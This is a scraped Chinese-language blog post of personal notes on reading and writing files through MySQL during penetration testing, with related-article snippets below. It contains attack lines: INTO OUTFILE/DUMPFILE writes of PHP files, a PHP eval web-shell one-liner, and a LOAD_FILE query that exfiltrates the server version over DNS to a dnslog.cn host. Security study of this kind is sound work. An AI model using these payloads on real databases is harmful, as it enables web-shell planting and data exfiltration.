Mysql读写文件随笔

最新推荐文章于 2024-08-02 08:32:51 发布
最新推荐文章于 2024-08-02 08:32:51 发布
阅读量580 收藏
点赞数
分类专栏: 安全基础随笔 文章标签: mysql 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/solitary_sen/article/details/103668600
版权

Mysql读写文件随笔


#当前版本 

SELECT VERSION();

在这里插入图片描述

一、查看当前用户权限 显示授权[针对用户]

SHOW GRANTS FOR 'root'@'localhost';
SHOW GRANTS;
SHOW GRANTS FOR CURRENT_USER();

在这里插入图片描述

二、mysql 写文件

INTO outfile 写完文件后会在文件后加一个\n换行符

select '<?php phpinfo(); ?>' INTO OUTFILE 'D:/Test.php';

在这里插入图片描述
在这里插入图片描述

INTO DUMPFILE <?php @eval($_POST['O8'); ?> 我们在平常的UDF提权中使用dumpfile进行dll文件

···
select ‘<?php phpinfo(); ?>’ INTO DUMPFILE ‘D:/Test.php’;
···
在这里插入图片描述

三、mysql 读文件

LOAD_FILE(file_name)

select LOAD_FILE('D:/Test.php');

在这里插入图片描述

load_file()和load data infile读取文件的方法为:新建一个表,读取文件为字符串形式插入表中,然后读出表中数据。

但是通常情况下有两个前提:

1.在拥有file权限的前提下

2.secure_file_priv不为NULL

show GLOBAL VARIABLES like 'secure_file_priv';

load_file()

CREATE table readFile(cmd text);
INSERT into readFile(cmd) VALUES (LOAD_FILE('D:/Test.php'));
select * from readFile;

在这里插入图片描述

注入过程中,往往会过滤掉load_file()这个函数,但是仍然有load data infile可以使用

load data infile

load data infile 'D:/Test.php' into table readFile;
select * from readFile;

在这里插入图片描述

非远程连接时可以尝试读取 system cat ‘D:/Test.php’ (未复现。。)

mysql禁止导入导出时,尝试OOB带外注入(未复现,mysql版本问题)

select load_file(concat('\\\\',version(),'.p2y52y.dnslog.cn'));

在这里插入图片描述

参考:
https://www.jianshu.com/p/340eedc67a9c
https://www.cnblogs.com/c1e4r/articles/8618692.html

进击的安全研究猿
关注
专栏目录
mysql数据库读写文件
qq_40334963的博客
02-26 4388
环境: centos7 mysql 5.6.47 用户:root@localhost 条件 mysql中涉及到读写操作,必然离不开secure_file_priv参数,它的值限制load data,select … outfile,load_file()函数可作用的文件位置。 secure_file_priv: 值为NULL表示禁止限制操作 值为某一目录,则只能操作该目录下的文件 没有值则表示不对...
datax读取mysql方式_解决DataX支持Mysql 8的读写
weixin_42551028的博客
01-21 1218
前言:如果是第一次安装使用datax,或您服务器Mysql版本是 <= 5.7的,请先参考我之前的随笔:https://www.cnblogs.com/zifan/p/9194793.html。背景:Mysql从5.6升级到8.0.19之后,发现原先正常跑的datax出错了。先来看下我的报错信息:(看不清请放大网页)1 2020-03-18 10:00:10.038 [0-0-0-write...
mysql读写文件
Sk1y的博客
04-19 4787
mysql读写文件 文章目录mysql读写文件secure_file_priv参数load_file()secure_file_priv为空secure_file_priv为NULLsecure_file_priv为某一目录load data infilesecure_file_priv为空secure_file_priv为NULLsecure_file_priv为某一目录绕过限制,加上localsystem echo/catmysqlshell的方法直接文件日志注入dumpfile和outfile的区
MySQLMySQL 如何读写数据?
最新发布
秋玄的博客
08-02 913
MySQL 底层是如何读写数据的?
MySQL 文件读写
iO快到碗里来
08-01 8854
MySQL在不同版本读写文件方法大致有这几个: 1.load_file() 2.load data infile() 3.system cat 4.outfile 5.dumpfile load_file()和load data infile读取文件的方法为:新建一个表,将读取文件以字符串形式插入表中,然后读出表中数据。load_file()也可以直接使用select load_file('文件路径') 读文件需满足条件 1.secure_file_priv值允许对该路径下的文件进行操作 2.数据库用户(m
mysql读取文件_mysql读写文件
weixin_39985279的博客
01-18 382
1、需要条件secure_file_priv不为null1、限制mysqld 不允许导入 | 导出secure_file_priv=null或secure_file_priv2、限制mysqld 的导入 | 导出 只能发生在/tmp/目录下secure_file_priv=/tmp/3、不对mysqld 的导入 | 导出做限制secure_file_priv=具有高权限1)读文件load_file...
mysql读写文件利用
m0_37622973的博客
07-14 289
本文主要内容摘自freebuf 原文链接:https://www.freebuf.com/articles/web/243136.html mysql读写文件利用 1.读文件 load_file 条件: (1)系统中关闭了selinux (2)知道文件路径 (3)secure_file_priv可读到web目录(secure_file_priv配置为空) eg:select load_file(“路径”); load data infile 条件: (1)系统中关闭了selinux (2)知道文件路径 (3
mysql 链接断掉事物依然进行_Mysql事务随笔
weixin_32955455的博客
02-02 527
一、什么是事务数据库中的概念,按我个人理解:能够保证一组任务全部执行成功或者全部执行失败的这么个机制,叫事务事务是数据库中重要概念,如果没有这种保障机制,数据库中的数据就是不安全的(就是无法保证数据的正确性)在数据库中,一组任务,就是放在一起执行的多条sql二、ACID保证数据安全所以如何才能保证数据安全呢?前人总结了如下四点1.原子性,一组任务全部执行成功或者全部执行失败.这是基础,因为我们一组...
datax支持mysql版本_解决DataX支持Mysql 8的读写
weixin_42465238的博客
01-18 893
前言:如果是第一次安装使用datax,或您服务器Mysql版本是 <= 5.7的,请先参考我之前的随笔:https://www.cnblogs.com/zifan/p/9194793.html。背景:Mysql从5.6升级到8.0.19之后,发现原先正常跑的datax出错了。先来看下我的报错信息:(看不清请放大网页)1 2020-03-18 10:00:10.038 [0-0-0-write...
手动关闭mysql_mysql启动与关闭(手动与自动)
weixin_32952295的博客
01-26 1369
手动管理mysql的启动与关闭[root@mysql ~]# service mysql start --手动启动mysqlStarting MySQL. SUCCESS![root@mysql ~]# service mysql stop --手动关闭mysqlShutting down MySQL.. SUCCESS![root@mysql ~]# mysqld --verbose --h...
MySQL】进阶:读写文件
kkza的博客
10-25 322
条件 my.ini配置文件中的secure_file_priv决定是否可以对文件进行读写,部分高版本(5.6.34以后)mysql中没有secure_file_priv,则默认为不允许读写 其中: 不允许读写:secure_file_priv 或secure_file_priv=NULL 允许读写: secure_file_priv="" 特定文件路径内可读写:secure_file_priv="C://Users/kongs/Desktop" load_file() ..
如何向MYSQL入二进制文件
06-11
介绍如何通过java或jsp向数据库存取二进制图片
mysql文件_mysql 读写文件特性和OOB注入
weixin_32802111的博客
01-25 286
Mysql读写文件主要是load_file和into outfile 和 into dumpfile, mysql 的导入导出的功能从mysql5版本起都受 系统变量@@secure_file_prev 影响,我们来看一下官方的解释image.pngThis option sets the secure_file_priv system variable, which is used to ...
mysql 文件_mysql注入文件
weixin_36333097的博客
01-18 692
select * from admin where id =-1 union select 1,'',3,4 into outfile 'c:\\1.php'select * from admin where id =-1 or 1=1 limit 0,1 INTO OUTFILE 'c:/2.php' LINES TERMINATED BY 0x3C3F70687020706870696E666...
Mysql查询结果入到文件
热门推荐
zuyi532的专栏
09-07 1万+
方法1: #>/usr/local/mysql/bin/mysql -uroot -proot -h localhost xxx库 -e " select * from xxx表 limit 1" >> out.txt   方法2: #>echo "select * from xxx表 limit 1" | /usr/local/mysql/bin/mysql -h 127.0.0.1
Mysql注入读写文件
zsdddddss的博客
12-25 192
Mysql注入读写文件
Mysql-ReadFile利用思路
Fly_鹏程万里
05-04 1325
文章前言 本篇文章我们主要介绍如何通过搭建一个Fake Mysql来伪装Mysql服务器并通过主动连接的方式来获取连接端的敏感文件的,也许会有人说自己连自己那还有啥意思呢?在某些情况下我们可以通过漏洞利用获取到Web后台的地址之后可以操控数据库连接配置时就会显得非常有用了 项目地址 https://github.com/Al1ex/Mysql-Readfile 项目使用 Step 1:启动服务 Step 2:操控连接配置连接恶意客户端获取客户端文件 PS:这里要获取的文件可以在
mysql read file_MySQL利用OS读写文件的前提
weixin_39865625的博客
01-19 388
读写文件的前提不同系统、不同的数据库版本有细微差异,以下实验都在Windows和Mysql 5.7.26下操作;1.拥有该File的读权限 或 该目录的权限2.secure_file_priv属性的值不为NULLWindows下的设置修改mysql.ini 文件,在[mysqld] 下添加条目: secure_file_priv =保存,重启mysql。secure_file_priv属性值的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值